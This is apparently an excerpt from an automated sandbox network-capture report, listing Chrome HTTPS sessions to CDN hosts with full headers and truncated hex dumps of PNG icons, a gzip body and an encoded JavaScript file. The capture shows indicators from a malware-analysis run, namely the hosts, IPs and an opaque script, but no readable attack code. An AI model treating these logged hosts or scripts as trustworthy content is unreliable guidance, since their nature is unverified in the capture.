                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;yancmp116:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-YANC-MP-116-13
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-19
                                                                                                                                                          X-Cdn-Request-ID: a1e6067c25e6cf9b5426011f5a65572d
                                                                                                                                                          2024-06-09 22:41:21 UTC513INData Raw: 31 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 94 dd 8e a3 30 0c 85 5f a5 d2 6a a5 99 8b 54 50 da 55 0b 5a 69 5e c5 e4 07 ac 86 18 25 61 67 18 d4 77 df 94 ad b6 a8 0d a5 33 57 a0 d8 7c 1c db c7 59 97 44 de 79 0b 2d 13 08 9a aa d5 ba 21 01 9a d5 12 84 b4 43 49 36 3c 98 a7 96 69 a9 3c b3 20 b0 73 f9 b6 fd 28 26 21 8b 55 3d 8d 9d d6 f7 d8 db 13 e6 d1 6b 39 70 d2 64 f3 1f 4a a9 42 a0 6b 35 f4 39 1a 8d 46 b2 52 13 3f 16 8a 8c 67 0e 3f 65 9e fe 7a 12 dc 48 e7 a0 92 c3 37 3e 2d 3b ef c9 30 e4 64 86 06 6c 85 e6 5f 6d 79 f6 24 80 6b 72 f2 82 99 08 d8 24 a1 61 4a 13 f8 7c e4 15 0a b5 97 36 07 dd d6 f0 42 2d 70 f4 fd ef 43 f2 5a b0 86 3e d9 e5 20 5f 1f 0a 76 ac 7d a3 a7 27 d7 d7 2f 2b ca 6b fa 13 86 ca 3b eb 42 d3 5b 42 13 44 c4 b5 a4 c9 ad 98 f4 56 4b fa 5f 4a 7a
                                                                                                                                                          Data Ascii: 1f50_jTPUZi^%agw3W|YDy-!CI6<i< s(&!U=k9pdJBk59FR?g?ezH7>-;0dl_my$kr$aJ|6B-pCZ> _v}'/+k;B[BDVK_Jz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          595192.168.2.55037623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC377OUTGET /pc/image-pc/index/383/menu/nv4.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 977
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-3d1"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[2],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE15[1],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464728
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6e0c8e43fb5938dd29343d534b68fed0
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127272
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC977INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 1c 08 06 00 00 00 72 0d df 94 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 83 49 44 41 54 48 89 a5 96 5d 68 14 57 14 c7 7f 99 bb bb 50 f1 8b 3e 35 42 2a 2d 62 1f d4 36 a9 5a 4c 21 18 6d 26 0a 92 a2 b0 88 12 08 e4 a5 83 79 29 b1 d0 5a 62 2c 31 06 aa 98 e6 2d e9 16 34 10 11 44 a7 f5 41 90 96 59 63 34 d6 24 68 49 cd 4a 4a 5e 8a 54 29 8a 7d 10 ad cc 4c ee ce 6e 1f 76 26 4c 66 67 36 9b ed 81 03 33 f7 fc cf fd dd ef 7b ab a8 c0 8c 54 b2 1a e8 00 de 04 66 81 0c 30 a3 6a fa 8b a5 72 ab 2a 80 29 2e e4 bd 90 f0 13 17 ee f7 3f 54 4d 9f ff 3f c0 b7 81 87 c0 aa 32 53 b2 c0 1c f0 23 70 72 d9 40 17 1a 07 3e 07 4e 03 ca 32 52 3b 62 65 02 56 02 8d c0 27 40 0d f0 93 aa e9 67 8d
                                                                                                                                                          Data Ascii: PNGIHDRrpHYsIDATH]hWP>5B*-b6ZL!m&y)Zb,1-4DAYc4$hIJJ^T)}Lnv&Lfg63{Tf0jr*).?TM?2S#pr@>N2R;beV'@g


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          596192.168.2.55037723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC377OUTGET /pc/image-pc/index/383/menu/nv5.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1729
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-6c1"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[11],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,10],EU-FRA-paris-GLOBAL1-CACHE7[2],EU-FRA-paris-GLOBAL1-CACHE22[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464728
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 480037070376530cced4ef727e350b0e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127272
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1729INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 1a 08 06 00 00 00 a9 4a 4c ce 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRJLtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          597192.168.2.55038290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC558OUTGET /pc/240516-03/static/js/components/125/fixedPost.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC625INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 836
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:00 GMT
                                                                                                                                                          ETag: "6645ca5c-344"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE2[4],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063155
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6a64785dca1daf06368fef7bdadb6b89
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528845
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC836INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 5a 67 41 59 42 64 41 47 67 47 38 41 78 41 47 51 44 4d 42 32 41 4c 6c 6f 46 63 30 59 41 58 41 53 33 55 77 39 4b 51 42 4b 63 67 46 39 53 48 41 44 59 42 46 53 73 7a 61 63 65 61 50 67 4e 49 68 68 41 49 68 5a 49 51 41 41 69 51 63 41 54 6c 30 37 71 41 33 41 48 6b 77 41 4b 78 43 63 41 64 41 42 4d 51 74 4c 6d 68 41 41 46 41 79 67 67 67 44 48 41 4a 36 59 53 4b 54 71 41 50 71 68 49 45 67 41 73 69 67 4f 4c 42 49 67 36 68 51 41 62 6c 41 53 4c 43 43 4d 41 49 53 45 49 6f 4b 6d 49 4a 6a 71 68 46 7a 75 41 42 62 71 2b 61 6b 47 4f 6c 77 41 76 49 58 46 4d 42 43 30 6c 61 52 6f 64 65 51 77 4b 41 43 32 45 4f 67 67 61 42 78 49 6a 4b 4b 6b 44 6c 41 63 55 48 4c
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgAYBdAGgG8AxAGQDMB2ALloFc0YAXAS3Uw9KQBKcgF9SHADYBFSszaceaPgNIhhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQtLmhAAFAygggDHAJ6YSKTqAPqhIEgAsigOLBIg6hQAblASLCCMAISEIoKmIJjqhFzuABbq+akGOlwAvIXFMBC0laRodeQwKAC2EOggaBxIjKKkDlAcUHL


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          598192.168.2.55038090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC649OUTGET /pc/image-pc/index/383/menu/nv6.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1513
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-5e9"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE1[4],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467537
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 51865d1b8a54bc3c2fdc25a9e18d16e2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124463
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1513INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 19 08 06 00 00 00 22 c0 4e 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR"N'tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          599192.168.2.55037990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC649OUTGET /pc/image-pc/index/383/menu/nv7.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 960
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:22 GMT
                                                                                                                                                          ETag: "64bf926e-3c0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE12[3],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467537
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 06b319f07dfdb742078f2fb29903fc8a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124463
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC960INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1d 00 00 00 1b 08 06 00 00 00 80 ca 84 12 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 72 49 44 41 54 48 89 bd d6 7b 88 54 65 18 c7 f1 cf cc 19 cf 6a 92 f5 4f 59 74 8f 2e b0 65 b9 49 1b a5 86 56 4b 46 62 64 a3 e4 1a b2 51 b6 dd a8 24 36 49 69 4d 37 0d 4d ca ae 32 5d 58 2d 15 aa c5 7f 12 c1 86 b2 30 2f 19 ca 9a 42 85 6d 17 08 31 49 33 bc cc 36 eb 6e fd 71 ce e4 68 bb ee cc 0a fe e0 70 de f3 9e e7 79 bf cf fb bc e7 7d de 93 50 a2 b2 99 f4 74 5c 8f a6 9a fa 96 6d a5 fa 75 a7 64 19 b6 3b 71 0f be c9 66 d2 93 4e 15 74 5f 7c ef 87 e6 6c 26 7d f5 a9 80 9e 59 d4 ae c0 f3 a7 02 3a e4 b8 e7 3b b3 99 f4 a0 be 40 13 3d bd c8 66 d2 03 70 0b aa 71 0d 6e c5 e9 c7 99 fd 8e 1f f0 2b 7e c6
                                                                                                                                                          Data Ascii: PNGIHDRpHYsrIDATH{TejOYt.eIVKFbdQ$6IiM7M2]X-0/Bm1I36nqhpy}Pt\mud;qfNt_|l&}Y:;@=fpqn+~


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          600192.168.2.55038190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC649OUTGET /pc/image-pc/index/383/menu/nv8.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1591
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:22 GMT
                                                                                                                                                          ETag: "64bf926e-637"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE6[3],EU-FRA-paris-GLOBAL1-CACHE3[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467537
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 78f4ea054c9166d96c07ef51b3a6db82
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124463
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC1591INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 1a 08 06 00 00 00 ad bf 9c f3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          601192.168.2.55038390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC386OUTGET /pc/image-pc/index/382/footer/btn_service_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 3968
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:11 GMT
                                                                                                                                                          ETag: "64c0a207-f80"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE5[4],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063149
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c31d7333e83efa35b50090570b3fbd91
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528851
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:21 UTC3968INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 2d 08 02 00 00 00 88 c6 d6 ee 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDR-tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          602192.168.2.55037454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
